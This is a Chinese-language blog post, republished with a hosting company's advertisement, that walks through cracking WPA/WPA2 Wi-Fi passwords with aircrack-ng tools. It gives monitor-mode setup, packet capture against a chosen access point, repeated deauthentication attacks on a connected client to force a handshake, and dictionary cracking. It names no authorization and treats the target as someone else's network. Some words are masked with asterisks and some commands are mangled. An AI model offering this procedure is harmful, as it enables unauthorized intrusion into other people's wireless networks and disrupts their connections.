WAP/WAP2无线网络破解-创新互联

声明:本文参考了网上的众多资料,加上自己的一晚上的奋斗实际操作总结

创新互联从2013年成立,先为临沧等服务建站,临沧等地企业,进行企业商务咨询服务。为临沧企业网站制作PC+手机+微官网三网同步一站式服务解决您的所有建站问题。

其中http://netsecurity.51cto.com/art/201105/264844_all.htm该文写的比较详细,可做参考。

1.查看无线网卡状态,激活无线网卡

ifconfig

ifconfig wlan0 up

2. 激活无线网卡至monitor即监听模式

airmon-ng start wlan0

3. 探测无线网络,抓取无线数据包

在正式抓包之前,一般都是先进行预来探测,来获取当前无线网络概况,包括AP的SSID、MAC地址、工作频道、无线客户端MAC及数量等。

注意:此处的客户端是指无线AP的客户端,并非破解的主机

airodump-ng mon0

注意:此处的BSSID为AP的mac,STATION为客户端的mac

找破解的目标是尽量选择排行靠前,且有数据(data)的AP,记下这里的AP和STATION的mac,及信道(CH)

BSSID             STATION           CH

C8:3A:35:2D:5E:78 88:E3:AB:C3:A6:0F   7

airodump-ng -c 7 –w abc--bssid C8:3A:35:2D:5E:78 mon0

#对该AP抓取数据包并写入abc文件

-c:该AP的无线信道

-w:表示要写入的文件

--bssid:AP的mac地址

 WAP/WAP2无线网络破解

4. 进行Deauth***加速破解过程。

上面的窗口不关,让其继续抓包,此时重开第二个窗口进行Deauth***加速破解过程。

aireplay-ng -0 1 -aC8:3A:35:2D:5E:78 -c 88:E3:AB:C3:A6:0F mon0

运行后可能会出现如下错误

WAP/WAP2无线网络破解

根据提示修改命令如下:

aireplay-ng--ignore-negative-one -0 1 -a C8:3A:35:2D:5E:78 -c 88:E3:AB:C3:A6:0F mon0

WAP/WAP2无线网络破解

可以看到不再报错,但是标识部分为【0 |31ACKS】表示没有数据应答,因此需要重复该步骤知道这里有数据应答且第一个窗口出现握手包才行,才可以进行下一步操作,可以调高这里的***数字

aireplay-ng--ignore-negative-one -0 10-a C8:3A:35:2D:5E:78 -c 88:E3:AB:C3:A6:0F mon0

注意:该处出现应答数据

WAP/WAP2无线网络破解

且刚才抓包数据的第一个窗口出现握手包,由于该出握手包一闪而过,在第二个窗口进行Deauth***需要留心观察第一个窗口(我这里是截图网上的,实际难以截图,一闪而过)

WAP/WAP2无线网络破解

5.做完上面关键的一步,接下来是激动人心的破解步骤了,WAP/WAP2均需要字典来破解,请提前下载好字典并放在破解系统上面

aircrack-ng -w beini.txt abc*.cap

 WAP/WAP2无线网络破解

-w:接破解的密码字典

abc*.cap 为第一个窗口抓取的数据包

接下来的就是坐等结果,能不能成功看你的字典好坏,对方AP密码难度系数,电脑的破解速度,和一点点运气了

注明:不知道为什么复制不了截图上去,详情请见附件

附件:http://down.51cto.com/data/2365717

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


网站栏目:WAP/WAP2无线网络破解-创新互联
URL标题:http://scyanting.com/article/hjiph.html